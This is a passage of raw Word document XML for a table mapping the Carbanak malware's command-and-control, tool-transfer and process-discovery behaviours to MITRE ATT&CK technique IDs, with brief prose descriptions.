          <w:p w14:paraId="55395728" w14:textId="1C44758D" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00DF711F" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13D1776B" w14:textId="24A9893C" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65DF0E33" w14:textId="0C41832E" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C224B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="39434C"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>T1573 Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39309B8F" w14:textId="076F1C25" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2D4789" w14:textId="77777777" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A8B2594" w14:textId="334078E4" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18CC9F68" w14:textId="40D30494" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D0C262E" w14:textId="066F9CD7" w:rsidR="00B707D9" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00B707D9">
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B707D9">
              <w:t xml:space="preserve"> uses the HTTP protocol with RC2+Base64 encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC3894" w:rsidRPr="00BC3894" w14:paraId="0748C2E5" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28950B2F" w14:textId="57C8B81E" w:rsidR="00BC3894" w:rsidRPr="00BC3894" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78DAD05B" w14:textId="25803D06" w:rsidR="00BC3894" w:rsidRPr="00BC3894" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D781B6E" w14:textId="54D17785" w:rsidR="00BC3894" w:rsidRPr="00BC3894" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1102.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03C14C37" w14:textId="6983427C" w:rsidR="00BC3894" w:rsidRPr="00BC3894" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29959A32" w14:textId="77777777" w:rsidR="00BC3894" w:rsidRPr="00BC3894" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B493D30" w14:textId="6B9A6F2D" w:rsidR="00BC3894" w:rsidRPr="00BC3894" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73BD5026" w14:textId="751F721F" w:rsidR="00BC3894" w:rsidRPr="00BC3894" w:rsidRDefault="00BC3894" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A68F55F" w14:textId="77777777" w:rsidR="005E1554" w:rsidRPr="005E1554" w:rsidRDefault="00497FA7" w:rsidP="005E1554">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="005E1554" w:rsidRPr="005E1554">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">To communicate with its C2 server, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="005E1554" w:rsidRPr="005E1554">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="005E1554" w:rsidRPr="005E1554">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> uses the HTTP protocol with </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="579A358C" w14:textId="77777777" w:rsidR="005E1554" w:rsidRPr="005E1554" w:rsidRDefault="005E1554" w:rsidP="005E1554">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E1554">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">RC2+Base64 encryption, adding additional characters not included in Base64. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52051540" w14:textId="77777777" w:rsidR="005E1554" w:rsidRPr="005E1554" w:rsidRDefault="005E1554" w:rsidP="005E1554">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E1554">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">It also inserts strings with different extensions (.gif,.htm, etc.) at random locations </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B8A96E" w14:textId="40660438" w:rsidR="00BC3894" w:rsidRPr="00BC3894" w:rsidRDefault="005E1554" w:rsidP="005E1554">
            <w:pPr>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E1554">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>in the HTTP request</w:t>
            </w:r>
            <w:r w:rsidR="00997845">
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3299" w:rsidRPr="003E52D1" w14:paraId="2047BF1C" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FBECAB6" w14:textId="0DD51978" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00FC3299">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75736B06" w14:textId="45D61E80" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00FC3299">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67DDCD3F" w14:textId="74D71333" w:rsidR="00FC3299" w:rsidRPr="00040CB5" w:rsidRDefault="00FC3299" w:rsidP="00FC3299">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC3299">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FC3299">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105</w:t>
            </w:r>
            <w:r w:rsidR="0058741C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3299">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4317E4B2" w14:textId="593420E0" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00FC3299">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06AD4F58" w14:textId="77777777" w:rsidR="00FC3299" w:rsidRPr="003E52D1" w:rsidRDefault="00FC3299" w:rsidP="00FC3299">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41C98BCE" w14:textId="55C37A7E" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00FC3299">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC3894">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C053773" w14:textId="473F0BE4" w:rsidR="00FC3299" w:rsidRPr="003E52D1" w:rsidRDefault="00FC3299" w:rsidP="00FC3299">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0508852E" w14:textId="77777777" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00FC3299">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Carbanak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> downloads the file </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>kldconfig.plug</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> from its C2 server. This file includes </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2D19E9" w14:textId="32E9E092" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00FC3299">
            <w:r>
              <w:t>the names of the processes to be monitored</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC3299" w:rsidRPr="003E52D1" w14:paraId="67B42F28" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68ABCD91" w14:textId="54B7F8DA" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21FA1768" w14:textId="0064485E" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1260C18F" w14:textId="1CCCCB3C" w:rsidR="00FC3299" w:rsidRPr="00040CB5" w:rsidRDefault="00FC3299" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1057 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FC3299">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Process Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24EE3715" w14:textId="6F926BF5" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61C3F9F1" w14:textId="77777777" w:rsidR="00FC3299" w:rsidRPr="003E52D1" w:rsidRDefault="00FC3299" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1101" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3658802C" w14:textId="5F4499CD" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1177" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C39E7DB" w14:textId="55640DBE" w:rsidR="00FC3299" w:rsidRPr="003E52D1" w:rsidRDefault="00FC3299" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3152" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5480AE86" w14:textId="578863FE" w:rsidR="00FC3299" w:rsidRDefault="00FC3299" w:rsidP="00B707D9">
            <w:r>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B707D9" w:rsidRPr="003E52D1" w14:paraId="324E73CA" w14:textId="77777777" w:rsidTr="00BC3894">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="585" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28B49246" w14:textId="50CBBB43" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E902FA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1497" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="325C5787" w14:textId="63851CF0" w:rsidR="00B707D9" w:rsidRPr="003E52D1" w:rsidRDefault="00B707D9" w:rsidP="00B707D9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003E52D1">
              <w:rPr>
